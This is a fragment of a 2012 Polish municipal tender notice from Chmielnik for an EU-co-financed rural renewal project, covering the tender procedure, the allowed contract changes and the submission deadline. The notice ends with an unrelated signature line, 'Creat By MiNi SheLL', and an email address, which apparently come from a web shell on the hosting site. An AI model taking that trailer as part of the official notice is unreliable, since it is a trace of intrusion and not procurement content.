<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Dopuszcza się możliwość przedłużenia terminu wykonania zamówienia w następujących przypadkach:
-wstrzymania robót lub przerw w pracach powstałych z przyczyn leżących po stronie Zamawiającego lub osób trzecich.
-działania siły wyższej, za które uważa się zdarzenia o charakterze nadzwyczajnym, występujące po zawarciu umowy, a których strony nie były w stanie przewidzieć w momencie zawierania i których zaistnienie lub skutki uniemożliwiają wykonanie przedmiotu zamówienia zgodnie z treścią umowy. 
- konieczności wykonania robót dodatkowych na skutek sytuacji niemożliwej wcześniej do przewidzenia.
- szczególnie niesprzyjających warunków atmosferycznych.
- opóźnień w realizacji zamówienia będących następstwem wad zawartych w dostarczonej przez zamawiającego dokumentacji projektowej lub w specyfikacji technicznej wykonania i odbioru robót.

2. Dopuszcza się możliwość zmiany wynagrodzenia umownego w okolicznościach:
- urzędowej zmiany stawki podatku VAT,
- jeżeli  zmiany dokumentacji będą zapobiegać powstaniu wady obiektu budowlanego, będą usprawniać bezpieczeństwo, usprawniać proces budowlany, wprowadzać nowe rozwiązania technologiczne i zmiany te będą korzystne dla Zamawiającego. 
- konieczności wykonania robót zamiennych,
3. Zmiany nazwy firmy lub adresu, zmiany kierownika budowy,
4. Zmiany formy zabezpieczenia należytego wykonania umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.chmielnik.com<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Chmielniku, Plac Kościuszki 7, 26-020 Chmielnik pok. Nr 209.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.07.2012 godzina 10:00, miejsce: Urząd Miasta i Gminy w Chmielniku, Plac Kościuszki 7, 26-020 Chmielnik pokój nr 102 - Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków EFRROW ( Europejskiego Funduszu  Rolnego na Rzecz Rozwoju Obszarów Wiejskich ) w ramach Programu Rozwoju  Obszarów Wiejskich na lata 2007 - 2013, Działanie Odnowa i rozwój wsi.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com